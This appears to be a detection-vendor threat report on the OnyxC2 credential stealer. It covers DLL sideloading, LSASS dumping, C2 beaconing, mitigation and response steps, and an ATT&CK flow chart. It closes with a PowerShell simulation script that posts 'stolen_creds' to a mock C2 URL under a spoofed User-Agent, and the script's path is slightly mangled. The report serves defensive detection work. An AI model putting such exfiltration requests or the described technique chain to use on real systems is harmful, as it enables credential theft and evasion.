Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
OnyxC2 is an emerging malware-as-a-service stealer designed to target credentials, two-factor authentication extensions, and cryptocurrency wallets across roughly 210 applications. The platform offers a full commercial-style toolkit, including a management panel, builder, and remote access functionality. It also relies on advanced evasion methods, including DLL sideloading with oversized signed binaries and encrypted payload components.
Investigation
BlackFog researchers examined multiple OnyxC2 samples and discovered a DLL sideloading method that abuses a signed host executable alongside a malicious 120 MB+ DLL disguised as an NVIDIA graphics library. Network analysis showed the malware communicating over HTTPS with a specific backend API endpoint. The researchers also found encrypted overlays embedded within the DLL, helping the malware avoid straightforward static analysis.
Mitigation
Deploying anti-data exfiltration controls at the endpoint can help block unauthorized outbound traffic regardless of which process is used. Security teams should monitor for suspicious DLL loads associated with signed binaries and investigate unusually large files appearing in user-writable paths. Strong application control policies and monitoring for unauthorized scheduled tasks are also recommended.
Response
If OnyxC2 activity is detected, isolate the affected system immediately to stop further data theft. Capture a full memory dump to recover the decrypted payload and check for active HVNC sessions or SOCKS5 proxy activity. Review all recently created scheduled tasks and inspect browser credential stores for evidence of compromise.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% Initial Access and Execution action_user_exec["<b>Action</b> – <b idea='T1204.002'>User Execution: Malicious File</b><br/>Description: Victims are lured into downloading<br/>password-protected archives containing<br/>malicious installers disguised as legitimate software."] class action_user_exec action action_side_loading["<b idea='T1574.002'>Hijack Execution Flow: DLL Side-Loading</b><br/>Description: Uses a legitimate, digitally signed<br/>executable to load a malicious, inflated DLL<br/>named borlndmm.dll."] class action_side_loading action malware_dll["<b idea='T1027.001'>Obfuscated Files or Information: Binary Padding</b><br/>Description: DLL is inflated to over 120 MB with<br/>legitimate NVIDIA graphics functions to<br/>evade security scanners."] class malware_dll malware %% Persistence and Command and Control action_persistence["<b idea='T1547'>Persistence</b><br/>Description: Employs optional scheduled task<br/>autorun capabilities."] class action_persistence action action_c2["<b idea='T1071.001'>Command and Control: Application Layer Protocol</b><br/>Description: Beaconing to backend via HTTPS at<br/>/backend/api/app.php often using Cloudflare<br/>fronting for stealth."] class action_c2 action %% Discovery and Credential Access action_discovery["<b idea='T1217'>Discovery</b><br/>Description: Harvests browser information including<br/>saved logins and cookies from 45 different<br/>Chromium and Gecko-based browsers."] class action_discovery discovery action_cred_mgr["<b idea='T1555.005'>Credential Access: Password Manager Credentials</b><br/>Description: Targets 5 different password manager<br/>applications to steal credentials."] class action_cred_mgr discovery action_lsass["<b idea='T1003.001'>Credential Access: OS Credential Dumping</b><br/>Description: Dumps LSASS memory to acquire<br/>credentials."] class action_lsass discovery %% Exfiltration action_exfil["<b idea='T1041'>Exfiltration Over C2 Channel</b><br/>Description: Stolen data including passwords, cookies,<br/>and wallet information is uploaded via the<br/>action=up_d request."] class action_exfil exfiltration %% Connection Flow action_user_exec –>|leads_to| action_side_loading action_side_loading –>|utilizes| malware_dll malware_dll –>|establishes| action_persistence action_persistence –>|initiates| action_c2 action_c2 –>|triggers| action_discovery action_discovery –>|leads_to| action_cred_mgr action_discovery –>|leads_to| action_lsass action_cred_mgr –>|provides data for| action_exfil action_lsass –>|provides data for| action_exfil action_exfil –>|communicates via| action_c2 "
Attack Flow
Detections
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
IOCs (HashSha256) to detect: Inside OnyxC2: The New Stealer Targeting 210 Apps
View
IOCs (SourceIP) to detect: Inside OnyxC2: The New Stealer Targeting 210 Apps
View
IOCs (DestinationIP) to detect: Inside OnyxC2: The New Stealer Targeting 210 Apps
View
Detection of OnyxC2 Stealer C2 Communication and TOR Anonymization [Proxy]
View
Detection of OnyxC2 Scheduled Task Autorun and Keylogger Activity [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary seeks to exfiltrate stolen browser credentials. To avoid detection by network security monitoring, they deploy a portable Tor binary to create an anonymized tunnel. Once the tunnel is established, the malware initiates a connection to its Command & Control (C2) server. To blend in with legitimate web traffic, the malware spoofs its User-Agent to appear as “Cloudflare” and targets a specific API endpoint hosted behind a Cloudflare proxy. This sequence is designed to trigger the detection rule’s correlation of
torcommand-line arguments and the specific/backend/api/app.phpURL pattern. -
Regression Test Script:
# Simulation of OnyxC2 Stealer Communication # 1. Simulate the presence of Tor (Creating a dummy file/process behavior) # In a real scenario, this would be the actual tor.exe $TorPath = "$env:TEMPtor.exe" "Simulated Tor Binary Content" | Out-File -FilePath $TorPath # Create a process execution event for 'tor' via command line Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # To ensure the detection logic 'command_line|contains: tor' hits, # we execute a command that includes the string 'tor' cmd.exe /c "echo initializing tor proxy..." # 2. Simulate the C2 Network Connection # We use PowerShell to simulate a network connection with the specific URL and User-Agent $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Attempting C2 communication to $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Cleanup Commands:
# Remove simulated artifacts Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Simulation cleanup complete."